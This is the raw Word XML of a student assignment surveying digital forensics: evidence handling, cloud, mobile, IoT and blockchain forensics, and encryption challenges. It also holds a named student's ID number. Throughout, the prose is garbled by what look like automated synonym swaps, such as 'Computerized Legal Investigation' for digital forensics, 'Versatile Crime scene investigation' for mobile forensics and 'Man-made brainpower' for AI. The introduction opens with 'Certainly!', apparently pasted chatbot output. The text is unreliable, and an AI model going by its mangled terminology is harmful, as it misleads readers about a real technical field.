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4618B" w14:textId="45946905" w:rsidR="00902109" w:rsidRDefault="00902109">
      <w:bookmarkStart w:id="0" w:name="_Hlk155933065"/>
      <w:bookmarkEnd w:id="0"/>
    </w:p>
    <w:p w14:paraId="4721E8FC" w14:textId="62CAF559" w:rsidR="00902109" w:rsidRDefault="00902109"/>
    <w:p w14:paraId="1F334302" w14:textId="4B796E73" w:rsidR="00902109" w:rsidRDefault="00902109" w:rsidP="00902109">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="0C8F12E3" wp14:editId="19C7554A">
            <wp:extent cx="5161084" cy="252285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5187777" cy="2535903"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="0ADB64B9" w14:textId="1DB3D225" w:rsidR="00902109" w:rsidRDefault="00902109" w:rsidP="00902109">
      <w:pPr>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="16918D1E" w14:textId="68DF69CC" w:rsidR="00902109" w:rsidRDefault="00902109" w:rsidP="00902109">
      <w:pPr>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5DEAB643" w14:textId="105F0B8C" w:rsidR="00902109" w:rsidRDefault="00902109" w:rsidP="00902109">
      <w:pPr>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="294AC038" w14:textId="33BCED53" w:rsidR="00902109" w:rsidRDefault="00902109" w:rsidP="00902109">
      <w:pPr>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1A8ED49E" w14:textId="77777777" w:rsidR="00902109" w:rsidRPr="0020337D" w:rsidRDefault="00902109" w:rsidP="00902109">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0020337D">
        <w:rPr>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
        <w:t>[NAME]:  MEHUL GOSWAMI</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="747F7E59" w14:textId="77777777" w:rsidR="00902109" w:rsidRPr="0020337D" w:rsidRDefault="00902109" w:rsidP="00902109">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0020337D">
        <w:rPr>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
        <w:t>[STUDENT ID]:  2214858</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A1F0B13" w14:textId="04DC355E" w:rsidR="00902109" w:rsidRPr="0020337D" w:rsidRDefault="00902109" w:rsidP="00902109">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0020337D">
        <w:rPr>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
        <w:t xml:space="preserve">[MODULE]: </w:t>
      </w:r>
      <w:r w:rsidR="0020337D" w:rsidRPr="0020337D">
        <w:rPr>
          <w:bCs/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
        <w:t>Digital Forensics Analysis</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="297978A9" w14:textId="64CE71AF" w:rsidR="00902109" w:rsidRPr="0020337D" w:rsidRDefault="00902109" w:rsidP="00902109">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0020337D">
        <w:rPr>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
        <w:t xml:space="preserve">[PROFESSER NAME]:  </w:t>
      </w:r>
      <w:r w:rsidR="0020337D" w:rsidRPr="0020337D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
        <w:t>Dr. Nitheesh Kaliyamurthy</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71E95FD7" w14:textId="210EC161" w:rsidR="00902109" w:rsidRDefault="00902109" w:rsidP="00902109">
      <w:pPr>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4E1D6CE5" w14:textId="59E7720B" w:rsidR="00902109" w:rsidRDefault="00902109" w:rsidP="00902109">
      <w:pPr>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1F0EFC92" w14:textId="1CFC2816" w:rsidR="00902109" w:rsidRDefault="00902109" w:rsidP="00902109">
      <w:pPr>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="109A8C91" w14:textId="140F4F79" w:rsidR="00902109" w:rsidRDefault="00902109" w:rsidP="00902109">
      <w:pPr>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2A68A2A9" w14:textId="0B34EEBC" w:rsidR="00902109" w:rsidRDefault="00902109" w:rsidP="00902109">
      <w:pPr>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="08B764C3" w14:textId="7EA144BC" w:rsidR="00902109" w:rsidRDefault="00902109" w:rsidP="00902109">
      <w:pPr>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="47440B17" w14:textId="4A0694BC" w:rsidR="00902109" w:rsidRDefault="00902109" w:rsidP="00902109">
      <w:pPr>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4069339F" w14:textId="1EEE332E" w:rsidR="00902109" w:rsidRDefault="00902109" w:rsidP="00902109">
      <w:pPr>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="332E2C13" w14:textId="0D5DAFDE" w:rsidR="00902109" w:rsidRDefault="00902109" w:rsidP="00902109">
      <w:pPr>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5E309EC1" w14:textId="0A473A6B" w:rsidR="00902109" w:rsidRDefault="00902109" w:rsidP="00902109">
      <w:pPr>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6998C85A" w14:textId="254B085A" w:rsidR="00902109" w:rsidRDefault="00902109" w:rsidP="00902109">
      <w:pPr>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1A462FDE" w14:textId="77777777" w:rsidR="00F11631" w:rsidRDefault="00F11631" w:rsidP="00902109">
      <w:pPr>
        <w:ind w:firstLine="720"/>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="36F06171" w14:textId="7A2843AA" w:rsidR="00DB7923" w:rsidRDefault="00F11631" w:rsidP="00F11631">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Introduction:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69336BCD" w14:textId="06CE4BB1" w:rsidR="00F11631" w:rsidRPr="00F11631" w:rsidRDefault="00F11631" w:rsidP="00F11631">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F11631">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Certainly! Computerized Legal Investigation is a part of criminological science that spotlights on the recuperation, protection, examination, and show of electronic proof. In a world progressively subject to computerized innovations, advanced legal sciences assumes a urgent part in examining cybercrimes, information breaks, and other illegal exercises including electronic </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00F11631">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>gadgets.Here</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00F11631">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> is a short prologue to the critical parts of computerized criminological investigation:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23983E92" w14:textId="77777777" w:rsidR="00F11631" w:rsidRDefault="00F11631" w:rsidP="00F11631">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F11631">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Proof Assortment:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B1C37CD" w14:textId="74956D8A" w:rsidR="00F11631" w:rsidRDefault="00F11631" w:rsidP="00F11631">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F11631">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> Computerized scientific examiners start by gathering electronic gadgets like PCs, cell phones, servers, or capacity media engaged with a case. Maintaining the integrity of the evidence throughout the investigation necessitates its careful handling and preservation.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02810B57" w14:textId="356CD460" w:rsidR="00F11631" w:rsidRDefault="00F11631" w:rsidP="00F11631">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F11631">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Preservation: </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4304D259" w14:textId="55C85C12" w:rsidR="00F11631" w:rsidRPr="00F11631" w:rsidRDefault="00F11631" w:rsidP="00F11631">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F11631">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>When gathered, the proof should be saved to forestall any change, harm, or pollution. This frequently includes making a scientific picture, a careful imitation of the first information, which permits examiners to work with a duplicate while safeguarding the honesty of the first proof.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B066FD5" w14:textId="77777777" w:rsidR="00F11631" w:rsidRPr="00F11631" w:rsidRDefault="00F11631" w:rsidP="00F11631">
      <w:pPr>
        <w:ind w:firstLine="720"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="650A4365" w14:textId="77777777" w:rsidR="00F11631" w:rsidRDefault="00F11631" w:rsidP="00F11631">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F11631">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Analysis:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30FD0D81" w14:textId="59B08C7B" w:rsidR="00F11631" w:rsidRPr="00F11631" w:rsidRDefault="00F11631" w:rsidP="00F11631">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F11631">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> Computerized legal investigators utilize specific instruments and strategies to dissect the gathered information. This might include looking at record structures, recuperating erased documents, decoding scrambled data, and distinguishing examples of conduct. The objective is to recreate occasions, courses of events, and exercises connected with the case.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0260E151" w14:textId="77777777" w:rsidR="00F11631" w:rsidRDefault="00F11631" w:rsidP="00F11631">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F11631">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Recuperation of Erased Information: </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37E0C27B" w14:textId="19DB0523" w:rsidR="00F11631" w:rsidRPr="00F11631" w:rsidRDefault="00F11631" w:rsidP="00F11631">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F11631">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Erased documents and antiques might in any case exist in the advanced domain. Computerized scientific devices assist in recuperating such information, which with canning be basic in grasping the activities of a suspect.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65521ACD" w14:textId="77777777" w:rsidR="00F11631" w:rsidRDefault="00F11631" w:rsidP="00F11631">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F11631">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Network Legal sciences:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="062403D8" w14:textId="333A7974" w:rsidR="00F11631" w:rsidRPr="00F11631" w:rsidRDefault="00F11631" w:rsidP="00F11631">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F11631">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> In cases including cybercrimes, experts might zero in on </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00F11631">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>analyzing</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00F11631">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> network traffic and logs to distinguish unapproved access, information exfiltration, or other pernicious exercises on PC organizations.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4DA07CB4" w14:textId="6DC131CD" w:rsidR="00902109" w:rsidRPr="00F11631" w:rsidRDefault="00902109" w:rsidP="00902109">
      <w:pPr>
        <w:ind w:firstLine="720"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="53A09549" w14:textId="528C02F6" w:rsidR="00902109" w:rsidRDefault="00902109" w:rsidP="00902109">
      <w:pPr>
        <w:ind w:firstLine="720"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="605A715B" w14:textId="08BB8FAC" w:rsidR="00902109" w:rsidRDefault="00902109" w:rsidP="00902109">
      <w:pPr>
        <w:ind w:firstLine="720"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1E836445" w14:textId="31AA7A0B" w:rsidR="00902109" w:rsidRDefault="00902109" w:rsidP="00902109">
      <w:pPr>
        <w:ind w:firstLine="720"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="037F86B6" w14:textId="7803603A" w:rsidR="00F11631" w:rsidRDefault="00F11631" w:rsidP="00F11631">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="2040"/>
        </w:tabs>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="348F7FD1" w14:textId="77777777" w:rsidR="00F11631" w:rsidRPr="00F11631" w:rsidRDefault="00F11631" w:rsidP="00F11631">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="2040"/>
        </w:tabs>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1BA76066" w14:textId="383AC5BC" w:rsidR="00056BB6" w:rsidRPr="00056BB6" w:rsidRDefault="00056BB6" w:rsidP="00056BB6">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00BA0812">
        <w:rPr>
          <w:b/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>1</w:t>
      </w:r>
      <w:r w:rsidRPr="00056BB6">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">. </w:t>
      </w:r>
      <w:r w:rsidRPr="00056BB6">
        <w:rPr>
          <w:b/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>CURRENT STATE OF THE FIELD</w:t>
      </w:r>
      <w:r w:rsidRPr="00056BB6">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07CF70A9" w14:textId="0DC56E55" w:rsidR="00056BB6" w:rsidRDefault="00056BB6" w:rsidP="00056BB6">
      <w:r>
        <w:t>Digital forensics is a rapidly developing field that is crucial to cybercrime investigations and prevention. The present status of the field reflects progressions in innovation, changes in digital dangers, and the developing requirement for gifted experts. Innovative Advances: The field has seen progressions in devices and strategies, including modern scientific programming, computerized reasoning (simulated intelligence), AI (ML), and blockchain examination apparatuses.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09FF79A5" w14:textId="77777777" w:rsidR="00056BB6" w:rsidRDefault="00056BB6" w:rsidP="00056BB6">
      <w:r>
        <w:t>Cloud Crime scene investigation:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72A84F3E" w14:textId="48874F71" w:rsidR="00056BB6" w:rsidRDefault="00056BB6" w:rsidP="00056BB6">
      <w:r>
        <w:t xml:space="preserve"> With the rising reception of distributed computing, computerized criminology has extended to incorporate difficulties connected with exploring occurrences that include cloud-based administrations. Experts in forensics must adjust to the distributed nature of data processing and storage.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6203D821" w14:textId="77777777" w:rsidR="00056BB6" w:rsidRDefault="00056BB6" w:rsidP="00056BB6">
      <w:r>
        <w:t>Versatile Crime scene investigation:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B1B35DD" w14:textId="6431B544" w:rsidR="00056BB6" w:rsidRDefault="00056BB6" w:rsidP="00056BB6">
      <w:r>
        <w:t xml:space="preserve"> The commonness of cell phones and other cell phones has prompted a huge spotlight on portable criminology. Specialists should now battle with many portable working frameworks, applications, and encryption techniques.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0FE1CAE7" w14:textId="77777777" w:rsidR="00056BB6" w:rsidRDefault="00056BB6" w:rsidP="00056BB6">
      <w:r>
        <w:t>Cybercrime Regulation:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2DF78E9C" w14:textId="1BBBD4DC" w:rsidR="00902109" w:rsidRDefault="00056BB6" w:rsidP="00056BB6">
      <w:r>
        <w:t xml:space="preserve"> States overall are refreshing and establishing regulation to address cybercrime, giving a legitimate system to computerized measurable examinations.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="259E3D51" w14:textId="6A2673FD" w:rsidR="00902109" w:rsidRDefault="00902109" w:rsidP="00902109">
      <w:pPr>
        <w:ind w:firstLine="720"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="603CAB31" w14:textId="1280616D" w:rsidR="00056BB6" w:rsidRDefault="00056BB6" w:rsidP="00902109">
      <w:pPr>
        <w:ind w:firstLine="720"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4C804FD9" w14:textId="1365C4BA" w:rsidR="00056BB6" w:rsidRPr="00056BB6" w:rsidRDefault="00056BB6" w:rsidP="00056BB6">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00BA0812">
        <w:rPr>
          <w:b/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>2</w:t>
      </w:r>
      <w:r w:rsidRPr="00056BB6">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">. </w:t>
      </w:r>
      <w:r w:rsidRPr="00056BB6">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">Intersection of digital forensics and </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00056BB6">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>cybersecurity :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="3C4B2290" w14:textId="77777777" w:rsidR="00056BB6" w:rsidRDefault="00056BB6" w:rsidP="00056BB6">
      <w:r>
        <w:t>The crossing point of computerized legal sciences and online protection is basic for forestalling, identifying, and answering digital occurrences.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2386BF9B" w14:textId="77777777" w:rsidR="00056BB6" w:rsidRDefault="00056BB6" w:rsidP="00056BB6">
      <w:r>
        <w:t>Occurrence Reaction:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3CD8962E" w14:textId="541ACF12" w:rsidR="00056BB6" w:rsidRDefault="00056BB6" w:rsidP="00056BB6">
      <w:r>
        <w:t xml:space="preserve"> Advanced criminology is a vital piece of episode reaction in network safety. Examiners use criminology to dissect and comprehend the idea of cyberattacks, recognize weaknesses, and foster systems to forestall future occurrences.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F1DAAB5" w14:textId="77777777" w:rsidR="00056BB6" w:rsidRDefault="00056BB6" w:rsidP="00056BB6">
      <w:r>
        <w:t>Threat Information:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="774D9362" w14:textId="03715D87" w:rsidR="00056BB6" w:rsidRDefault="00056BB6" w:rsidP="00056BB6">
      <w:r>
        <w:t xml:space="preserve"> By revealing cybercriminals' tactics, techniques, and procedures (TTPs), digital forensics contributes to threat intelligence. This data assists network safety experts with upgrading their protections.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60CA271A" w14:textId="77777777" w:rsidR="00BA0812" w:rsidRDefault="00056BB6" w:rsidP="00056BB6">
      <w:r>
        <w:t>Preventative Actions:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62265847" w14:textId="44C8A762" w:rsidR="00056BB6" w:rsidRDefault="00056BB6" w:rsidP="00056BB6">
      <w:r>
        <w:t xml:space="preserve"> By investigating advanced proof from past occurrences, online protection groups can proactively fortify their safeguards, fix weaknesses, and work on generally versatility against digital dangers.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02850F7D" w14:textId="464AFBBE" w:rsidR="00902109" w:rsidRDefault="00902109" w:rsidP="00902109">
      <w:pPr>
        <w:ind w:firstLine="720"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="45A8860F" w14:textId="6D2BC5B6" w:rsidR="00BA0812" w:rsidRDefault="00BA0812" w:rsidP="00902109">
      <w:pPr>
        <w:ind w:firstLine="720"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="434CD645" w14:textId="75C4F858" w:rsidR="00BA0812" w:rsidRDefault="00BA0812" w:rsidP="00902109">
      <w:pPr>
        <w:ind w:firstLine="720"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5E4FFBCB" w14:textId="77777777" w:rsidR="00BA0812" w:rsidRPr="00BA0812" w:rsidRDefault="00BA0812" w:rsidP="00BA0812">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00BA0812">
        <w:rPr>
          <w:b/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>3. Trends on the Rise:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D7B7436" w14:textId="77777777" w:rsidR="00BA0812" w:rsidRDefault="00BA0812" w:rsidP="00BA0812">
      <w:r>
        <w:t>Man-made brainpower and AI: The incorporation of artificial intelligence and ML into advanced criminology instruments improves computerization, oddity discovery, and example acknowledgment, permitting examiners to effectively deal with immense measures of information more.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="035FC333" w14:textId="77777777" w:rsidR="00BA0812" w:rsidRDefault="00BA0812" w:rsidP="00BA0812">
      <w:r>
        <w:t>IoT Investigation: As the Web of Things (IoT) keeps on developing, computerized crime scene investigation is adjusting to address the novel difficulties presented by IoT gadgets, including different information designs, restricted handling power, and fluctuated correspondence conventions.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66729FAE" w14:textId="14D17884" w:rsidR="00BA0812" w:rsidRDefault="00BA0812" w:rsidP="00BA0812">
      <w:r>
        <w:t>Blockchain Legal sciences: With the ascent of blockchain innovation and digital currencies, there is an expanded interest for specialists in blockchain criminology to follow and examine exchanges on decentralized records.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="430909FD" w14:textId="09B6E605" w:rsidR="00293934" w:rsidRDefault="00293934" w:rsidP="00BA0812">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="48A31333" wp14:editId="09F69B1F">
            <wp:extent cx="5092700" cy="3819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urvey_on_adoption_of_emerging_technologies_ppt_powerpoint_presentation_professional_show_Slide01.jpg"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId9">
                      <a:extLst>
                        <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                          <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
                        </a:ext>
                      </a:extLst>
                    </a:blip>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5092700" cy="3819525"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="614FB949" w14:textId="7D1B449B" w:rsidR="00BA0812" w:rsidRPr="00293934" w:rsidRDefault="00293934" w:rsidP="00BA0812">
      <w:pPr>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00293934">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>FIG 1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48C7F17A" w14:textId="3987AC63" w:rsidR="00BA0812" w:rsidRDefault="00BA0812" w:rsidP="00BA0812"/>
    <w:p w14:paraId="6A3548CD" w14:textId="77777777" w:rsidR="00BA0812" w:rsidRPr="00BA0812" w:rsidRDefault="00BA0812" w:rsidP="00BA0812">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00BA0812">
        <w:rPr>
          <w:b/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>4. Key Difficulties:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C03E1D3" w14:textId="77777777" w:rsidR="00BA0812" w:rsidRDefault="00BA0812" w:rsidP="00BA0812">
      <w:r>
        <w:t xml:space="preserve">Encryption: </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1936C554" w14:textId="7CC2109A" w:rsidR="00BA0812" w:rsidRDefault="00BA0812" w:rsidP="00BA0812">
      <w:r>
        <w:t>The multiplication of solid encryption techniques obstructs specialists' capacity to get to and break down computerized proof. This challenge accentuates the requirement for coordinated effort between innovation organizations, policing, policymakers.</w:t>
      </w:r>
